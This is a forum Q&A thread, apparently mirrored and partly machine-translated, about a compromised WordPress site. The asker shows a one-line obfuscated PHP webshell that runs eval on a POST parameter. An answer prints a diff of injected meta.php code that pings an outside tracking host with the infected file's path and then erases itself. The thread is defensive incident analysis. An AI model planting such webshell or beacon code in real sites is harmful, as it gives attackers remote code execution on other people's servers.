wordpress-WordPress网站被黑了？可疑的PHP文件—

WordPress网站被黑了？可疑的PHP文件

I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

编辑于：2019.11.18 13:40 发布于：2016.08.18 07:37

| 评论4 | 收藏 | 浏览61 |

: doulao1966

声望： 0

: doufen1890 感谢你们！我删除了文件并修复了meta.php（参见下面的答案）。为什么3个downvotestho？; 接近 4 年之前回复

: duanming7961 该代码看起来像是运行任意代码。删除它，然后看看这个codex页面。; 接近 4 年之前回复

: doukanxi4246 我不确定代码的作用，但该文件没有出现在任何wordpress文档中，因此除非您安装的某个应用程序使用它，否则它可能是恶意的。; 接近 4 年之前回复

: dt1888 str_rot13（'riny'）返回eval...; 接近 4 年之前回复

3个回答

按赞数排序

立即删除文件！</ em> </ strong> </ p>

< p>此 PHP </ code>代码是经过修改的 webshell 。这些可能会被用来攻击其他网站，并可能导致严重的法律问题！</ p>

删除后，你应该</ em>也修复让文件进入的泄漏！</ p>
</ div>

展开原文

原文

Delete the file instantly!

This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

After deletion you should also fix the leak that let the file in!

发布于：2016.08.18 08:52

评论 0 |

| 已采纳

: duanbin3021

声望： 0

Yes, the PHP script allows to run code on the Server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }

FYI, here are the md5sums of infected files:

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php

发布于：2016.08.18 09:55

评论 0 |

: doujuxin7392

声望： 0

您应该在您的网站上安装类似Wordfence插件的内容，这将连续检查所有插件和主题文件夹发布版本。它还有助于防止像这样的危险文件上传。 </ p>
</ div>

展开原文

原文

You should install something like the Wordfence plug in on your website, which will check all of the plug in and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.

发布于：2017.02.10 08:31

评论 0 |